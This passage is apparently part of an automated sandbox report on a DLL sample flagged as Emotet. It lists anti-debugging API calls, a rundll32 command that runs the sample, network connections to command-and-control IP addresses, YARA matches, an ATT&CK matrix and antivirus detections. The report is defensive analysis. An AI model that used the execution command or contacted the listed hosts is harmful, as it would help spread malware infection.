                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6F7F7 mov eax, dword ptr fs:[00000030h]9_2_02E6F7F7
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001C49A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10021743
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_100167D5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,2_2_1001FC21
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,2_2_1001FC43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1001C49A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10021743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_100167D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,3_2_1001FC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,3_2_1001FC43

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1Jump to behavior
                      Source: rundll32.exe, 0000000A.00000002.817760750.0000000002D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 0000000A.00000002.817760750.0000000002D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 0000000A.00000002.817760750.0000000002D70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 0000000A.00000002.817760750.0000000002D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_10027704
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,2_2_1000A803
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_10023880
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10027704
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_1000A803
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_10023880
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10022853 cpuid 2_2_10022853
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001F914 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_1001F914
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100178B6

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fb0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4660000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fa0000.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4950000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4a90000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4710000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4630000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fd0000.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4d20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4820000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fe0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ac0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4e70000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4960000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4990000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47f0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4710000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4570000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4c70000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5000000.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4b90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.720000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4980000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ea0000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4e70000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49e0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ed0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4790000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4790000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4950000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5010000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fb0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4f70000.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4f70000.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.47f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fd0000.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4740000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4bc0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4b90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4960000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4d20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4820000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ca0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.47f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4c70000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4630000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312426426.0000000004790000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.303864837.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308717246.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.312591906.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308496197.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818600479.0000000004CA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816263427.0000000000551000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312707880.0000000004991000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818149949.0000000004821000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312062487.0000000004571000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312157578.0000000004630000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308585132.0000000004D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.303434167.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.310610436.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818434536.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818253319.00000000049B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308691982.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312211500.0000000004661000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818342645.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816816895.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818930567.0000000004F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308783720.0000000004FE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312650834.0000000004960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818769110.0000000004E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818077767.0000000004741000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818990382.0000000004FA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818118455.00000000047F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.311999484.0000000004540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818553417.0000000004C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312609575.0000000004821000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818862903.0000000004EA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818277549.00000000049E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.819036173.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818224414.0000000004981000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818194001.0000000004950000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.819084555.0000000005001000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312500126.00000000047C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.303487631.0000000000ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816889903.0000000000721000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816215619.0000000000520000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308811399.0000000005011000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308759081.0000000004FB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818044267.0000000004710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818377834.0000000004AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818471974.0000000004BC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312556159.00000000047F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,2_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,3_2_100011C0

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API2DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery35SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553115 Sample: pugKLanrj3 Startdate: 14/01/2022 Architecture: WINDOWS Score: 96 39 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->39 41 85.214.67.203 STRATOSTRATOAGDE Germany 2->41 43 23 other IPs or domains 2->43 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 4 other signatures 2->61 9 loaddll32.exe 1 2->9         started        11 svchost.exe 1 2->11         started        13 svchost.exe 1 2->13         started        15 2 other processes 2->15 signatures3 process4 process5 17 rundll32.exe 2 9->17         started        21 cmd.exe 1 9->21         started        23 regsvr32.exe 9->23         started        dnsIp6 37 192.168.2.1 unknown unknown 17->37 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->53 25 rundll32.exe 17->25         started        27 rundll32.exe 21->27         started        29 rundll32.exe 23->29         started        signatures7 process8 process9 31 rundll32.exe 25->31         started        35 rundll32.exe 2 27->35         started        dnsIp10 45 45.138.98.34, 49748, 80 M247GB Germany 31->45 47 69.16.218.101, 49749, 8080 LIQUIDWEBUS United States 31->47 49 System process connects to network (likely due to code injection or exploit) 31->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->51 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      pugKLanrj3.dll27%VirustotalBrowse
                      pugKLanrj3.dll33%ReversingLabsWin32.Trojan.Emotet
                      pugKLanrj3.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.3090000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.550000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4710000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.47f0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4ed0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.2e60000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4820000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.520000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4990000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4a90000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                      3.2.rundll32.exe.2e50000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.6c0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4660000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4fa0000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4630000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4fe0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4540000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4960000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4ac0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.2e30000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4570000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4c70000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.5000000.23.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.720000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4e70000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4ea0000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4980000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.49e0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4ea0000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                      2.2.regsvr32.exe.ed0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4790000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4fb0000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4950000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.5010000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.47c0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.47a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4f70000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4b90000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.4fd0000.22.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.690000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.6c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4970000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4bc0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4740000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4d20000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      2.2.regsvr32.exe.d20000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4820000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.4ca0000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.47f0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      10.2.rundll32.exe.49b0000.10.unpack100%AviraHEUR/AGEN.1145233Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      windowsupdate.s.llnwi.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      windowsupdate.s.llnwi.net
                      41.63.96.128
                      truefalseunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.ver)svchost.exe, 00000011.00000002.435659671.0000024AA74EF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
